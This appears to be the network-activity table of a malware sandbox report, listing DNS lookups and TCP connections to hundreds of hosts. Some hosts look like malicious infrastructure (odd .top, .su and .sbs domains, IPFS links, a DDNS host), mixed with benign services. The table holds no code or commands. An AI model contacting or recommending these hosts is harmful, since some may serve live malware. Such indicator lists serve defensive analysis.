| US | 8.8.8.8:53 | 23-122-210-174.lightspeed.cicril.sbcglobal.net | udp |
| US | 8.8.8.8:53 | pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev | udp |
| US | 8.8.8.8:53 | cvinetwork.org | udp |
| US | 8.8.8.8:53 | 45.148.200.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.103.15.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.108.137.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.138.210.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.34.188.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.166.250.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.36.155.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.169.252.24.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.131.67.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.16.11.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.62.68.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.83.233.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.33.145.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.132.234.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.174.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.169.67.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.47.190.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.153.59.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.54.242.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.122.250.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.210.18.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.154.144.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.98.145.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.250.118.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.143.230.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.233.225.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.120.180.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.50.61.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.224.89.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.72.77.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.102.59.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.252.1.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.156.76.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.60.175.202.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.48.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.166.31.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.20.154.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.138.37.14.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.104.17.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.74.155.218.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.127.142.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.73.88.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.13.248.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.121.230.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.110.170.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.173.77.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.saf-oil.ru | udp |
| US | 8.8.8.8:53 | 52.97.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| CN | 211.149.230.178:80 | www.hseda.com | tcp |
| VN | 103.216.119.164:80 | xinhgai.tv | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| US | 172.66.0.235:443 | pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| US | 23.122.210.174:80 | 23-122-210-174.lightspeed.cicril.sbcglobal.net | tcp |
| US | 50.31.188.149:443 | cvinetwork.org | tcp |
| BR | 186.225.153.226:443 | palharesinformatica.com.br | tcp |
| US | 8.8.8.8:53 | eoufaoeuhoauengi.su | udp |
| RU | 87.236.16.222:443 | www.saf-oil.ru | tcp |
| GB | 165.220.134.146:80 | 165.220.134.146 | tcp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.16.236.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.188.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.210.122.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.153.225.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.119.216.103.in-addr.arpa | udp |
| US | 67.213.59.251:80 | 67.213.59.251 | tcp |
| US | 8.8.8.8:53 | a15aaa1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | utorrent-backup-server.top | udp |
| US | 8.8.8.8:53 | soft.110route.com | udp |
| US | 8.8.8.8:53 | 146.134.220.165.in-addr.arpa | udp |
| CN | 47.98.177.117:8888 | tcp | |
| CN | 49.232.126.36:9000 | tcp | |
| KR | 112.217.207.130:80 | 112.217.207.130 | tcp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | 251.59.213.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.207.217.112.in-addr.arpa | udp |
| NL | 194.15.46.189:80 | 194.15.46.189 | tcp |
| CN | 112.27.189.32:8090 | tcp | |
| US | 8.8.8.8:53 | 189.46.15.194.in-addr.arpa | udp |
| HK | 47.79.66.210:80 | a15aaa1.oss-cn-hongkong.aliyuncs.com | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server.top | tcp |
| CN | 39.106.158.243:80 | soft.110route.com | tcp |
| US | 8.8.8.8:53 | cfs10.blog.daum.net | udp |
| US | 8.8.8.8:53 | 210.66.79.47.in-addr.arpa | udp |
| SE | 94.255.218.185:80 | 94.255.218.185 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | kotov.lol | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 185.218.255.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.8.203.116.in-addr.arpa | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| KR | 203.232.37.151:80 | 203.232.37.151 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | tail-cease.cyou | udp |
| US | 104.21.93.105:443 | tail-cease.cyou | tcp |
| US | 8.8.8.8:53 | plastic-mitten.sbs | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | looky-marked.sbs | udp |
| US | 8.8.8.8:53 | wrench-creter.sbs | udp |
| US | 104.243.129.2:80 | 104.243.129.2 | tcp |
| BR | 187.115.56.93:80 | 187.115.56.93 | tcp |
| TW | 203.204.217.190:8080 | 203.204.217.190 | tcp |
| US | 8.8.8.8:53 | pid.fly160.com | udp |
| US | 8.8.8.8:53 | slam-whipp.sbs | udp |
| US | 8.8.8.8:53 | record-envyp.sbs | udp |
| TH | 58.9.110.23:18063 | tcp | |
| US | 8.8.8.8:53 | copper-replace.sbs | udp |
| US | 8.8.8.8:53 | savvy-steereo.sbs | udp |
| US | 8.8.8.8:53 | preside-comforter.sbs | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 151.37.232.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.93.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.129.243.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.56.115.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.217.204.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| KR | 121.53.85.3:80 | cfs10.blog.daum.net | tcp |
| US | 8.8.8.8:53 | by.haory.cn | udp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 80.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.85.53.121.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 217.92.214.15:8088 | 217.92.214.15 | tcp |
| CN | 182.92.0.5:80 | pid.fly160.com | tcp |
| CN | 39.108.237.194:80 | tcp | |
| KR | 1.214.192.147:80 | 1.214.192.147 | tcp |
| CN | 101.226.27.118:80 | by.haory.cn | tcp |
| US | 209.141.35.225:80 | 209.141.35.225 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| US | 8.8.8.8:53 | 15.214.92.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.35.141.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.192.214.1.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ser.nrovn.xyz | udp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | mininews.kpzip.com | udp |
| US | 38.114.122.39:443 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| CN | 150.158.25.244:9000 | tcp | |
| US | 8.8.8.8:53 | 39.122.114.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cd.textfiles.com | udp |
| US | 8.8.8.8:53 | www.aqianniao.com | udp |
| US | 8.8.8.8:53 | 172-105-66-118.ip.linodeusercontent.com | udp |
| US | 8.8.8.8:53 | down10d.zol.com.cn | udp |
| US | 8.8.8.8:53 | tianyinsoft.top | udp |
| RU | 176.111.174.138:8000 | 176.111.174.138 | tcp |
| US | 8.8.8.8:53 | www.xn--on3b15m2lco2u.com | udp |
| CN | 202.107.235.202:8088 | tcp | |
| US | 8.8.8.8:53 | dow.andylab.cn | udp |
| US | 8.8.8.8:53 | tengfeidn.com | udp |
| US | 8.8.8.8:53 | 138.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softbank126023203236.bbtec.net | udp |
| VN | 103.173.254.78:80 | 103.173.254.78 | tcp |
| CN | 211.97.92.167:80 | mininews.kpzip.com | tcp |
| CN | 110.40.51.56:5700 | tcp | |
| CN | 47.120.46.210:80 | tcp | |
| CN | 58.215.245.2:9000 | tcp | |
| CN | 106.42.31.65:8088 | tcp | |
| RU | 92.127.156.174:8880 | 92.127.156.174 | tcp |
| KR | 218.147.147.172:80 | tcp | |
| CN | 119.32.29.121:8309 | tcp | |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| CZ | 77.240.97.71:81 | 77.240.97.71 | tcp |
| CL | 190.215.253.57:80 | 190.215.253.57 | tcp |
| US | 166.150.43.236:80 | 166.150.43.236 | tcp |
| CN | 47.104.169.91:80 | tcp | |
| CN | 113.106.6.106:14319 | tcp | |
| VN | 113.160.249.9:80 | 113.160.249.9 | tcp |
| CN | 47.104.173.216:8082 | tcp | |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| CN | 180.167.115.186:8011 | tcp | |
| US | 144.34.162.13:80 | 144.34.162.13 | tcp |
| US | 8.8.8.8:53 | a23uuu1.oss-cn-hongkong.aliyuncs.com | udp |
| KW | 178.61.160.6:5001 | 178.61.160.6 | tcp |
| US | 8.8.8.8:53 | 71.97.240.77.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| HK | 47.79.66.210:443 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 208.86.224.90:80 | cd.textfiles.com | tcp |
| DE | 172.105.66.118:80 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| CN | 139.9.248.128:80 | tianyinsoft.top | tcp |
| JP | 126.23.203.236:80 | softbank126023203236.bbtec.net | tcp |
| CN | 122.143.2.98:80 | down10d.zol.com.cn | tcp |
| CN | 116.142.249.98:80 | dow.andylab.cn | tcp |
| CN | 139.196.217.38:80 | tengfeidn.com | tcp |
| CN | 113.219.142.35:80 | www.aqianniao.com | tcp |
| KR | 221.139.49.8:80 | www.xn--on3b15m2lco2u.com | tcp |
| US | 8.8.8.8:53 | 174.156.127.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.43.150.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.160.61.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.162.34.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.253.215.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.254.173.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.249.160.113.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.89.167.103.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 206.217.142.166:1234 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | 236.203.23.126.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.19:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | 118.66.105.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.224.86.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.156.210.64.in-addr.arpa | udp |
| GB | 64.210.156.17:443 | media.trafficjunky.net | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| CN | 8.138.81.152:5555 | tcp | |
| HK | 154.12.82.11:808 | 154.12.82.11 | tcp |
| US | 8.8.8.8:53 | www.zhikey.com | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| GB | 64.210.156.5:443 | hw-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.82.12.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| HK | 47.79.66.210:80 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| ES | 47.62.190.226:8081 | 47.62.190.226 | tcp |
| HK | 43.132.12.146:9000 | 43.132.12.146 | tcp |
| US | 8.8.8.8:53 | paonancs.cn | udp |
| US | 8.8.8.8:53 | 226.190.62.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.12.132.43.in-addr.arpa | udp |
| CN | 121.43.104.75:8080 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| TH | 58.9.110.23:18063 | tcp | |
| CN | 180.140.124.53:60 | tcp | |
| CN | 61.131.3.86:9991 | tcp | |
| US | 8.8.8.8:53 | adf6.adf6.com | udp |
| US | 8.8.8.8:53 | download.innovare.no | udp |
| US | 8.8.8.8:53 | down.mvip8.ru | udp |
| US | 104.21.8.89:443 | down.mvip8.ru | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 89.8.21.104.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| CN | 39.100.254.136:80 | www.zhikey.com | tcp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| RU | 87.251.102.94:80 | 87.251.102.94 | tcp |
| US | 206.217.142.166:1234 | tcp | |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| ID | 103.123.98.86:8082 | 103.123.98.86 | tcp |
| GB | 89.197.154.115:80 | 89.197.154.115 | tcp |
| US | 8.8.8.8:53 | 94.102.251.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.154.197.89.in-addr.arpa | udp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 172.105.66.118:8080 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| HK | 8.210.218.210:80 | paonancs.cn | tcp |
| US | 8.8.8.8:53 | stdown.dinju.com | udp |
| US | 8.8.8.8:53 | klfs.synology.me | udp |
| CN | 101.226.27.117:80 | by.haory.cn | tcp |
| US | 8.8.8.8:53 | 86.98.123.103.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | sfa.com.ar | udp |
| KR | 27.102.130.169:801 | 27.102.130.169 | tcp |
| IN | 116.206.151.203:478 | 116.206.151.203 | tcp |
| HK | 43.132.13.252:9000 | 43.132.13.252 | tcp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 8.8.8.8:53 | 210.218.210.8.in-addr.arpa | udp |
| US | 154.216.20.237:80 | 154.216.20.237 | tcp |
| RU | 185.215.113.205:8080 | 185.215.113.205 | tcp |
| NO | 217.149.124.92:80 | download.innovare.no | tcp |
| US | 104.21.67.89:80 | adf6.adf6.com | tcp |
| US | 8.8.8.8:53 | a19ccc1.oss-cn-hongkong.aliyuncs.com | udp |
| CN | 47.104.173.216:9876 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| IT | 95.255.114.11:80 | 95.255.114.11 | tcp |
| US | 8.8.8.8:53 | 203.151.206.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.130.102.27.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.13.132.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.20.216.154.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 89.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.124.149.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.114.255.95.in-addr.arpa | udp |
| CN | 120.41.69.75:9096 | klfs.synology.me | tcp |
| CN | 61.240.220.214:80 | stdown.dinju.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 190.61.250.130:80 | sfa.com.ar | tcp |
| RU | 176.111.174.140:443 | tcp | |
| CN | 113.201.158.118:80 | mininews.kpzip.com | tcp |
| US | 8.8.8.8:53 | dcwblida.dz | udp |
| US | 8.8.8.8:53 | filelu.com | udp |
| US | 104.26.12.42:443 | filelu.com | tcp |
| US | 8.8.8.8:53 | 130.250.61.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.12.26.104.in-addr.arpa | udp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | alien-training.com | udp |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| US | 8.8.8.8:53 | bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link | udp |
| CN | 42.56.81.104:80 | stdown.dinju.com | tcp |
| HK | 47.79.66.211:443 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 8.8.8.8:53 | 3434.filelu.cloud | udp |
| US | 8.8.8.8:53 | quanlyphongnet.com | udp |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.66.79.47.in-addr.arpa | udp |
| HK | 219.73.22.64:8084 | 219.73.22.64 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 28.237.23.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.35.104.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.22.73.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| CN | 101.35.228.105:8888 | tcp | |
| NL | 83.87.76.41:80 | 83.87.76.41 | tcp |
| KR | 119.193.158.215:80 | 119.193.158.215 | tcp |
| US | 170.250.53.236:80 | 170.250.53.236 | tcp |
| CN | 117.50.194.20:80 | tcp | |
| RS | 79.101.0.33:443 | tcp | |
| US | 74.64.155.4:9090 | 74.64.155.4 | tcp |
| US | 8.8.8.8:53 | dz0nhlj1q8ac3.cloudfront.net | udp |
| US | 8.8.8.8:53 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | udp |
| IT | 217.58.56.138:8001 | 217.58.56.138 | tcp |
| DZ | 41.111.143.136:443 | dcwblida.dz | tcp |
| US | 166.167.172.14:8007 | 166.167.172.14 | tcp |
| HK | 47.79.66.211:80 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 47.94.196.131:80 | tcp | |
| RU | 176.113.115.203:80 | 176.113.115.203 | tcp |
| TH | 45.141.26.180:443 | tcp | |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| PL | 91.225.132.57:80 | 91.225.132.57 | tcp |
| US | 209.94.90.2:443 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | tcp |
| IE | 52.218.121.60:80 | alien-training.com | tcp |
| RU | 45.90.34.133:80 | pb.agnt.ru | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 89.197.154.115:7700 | tcp | |
| GB | 88.221.135.98:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 2.90.94.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.76.87.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.121.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.155.64.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.34.90.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.53.250.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.158.193.119.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.26.141.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.87.201.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.172.167.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.56.58.217.in-addr.arpa | udp |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 180.117.160.2:80 | tcp | |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.101.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.143.111.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.132.225.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.135.221.88.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 122.51.183.116:1234 | tcp | |
| KR | 154.90.62.248:80 | 154.90.62.248 | tcp |
| NL | 18.239.63.181:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 209.94.90.2:443 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | tcp |
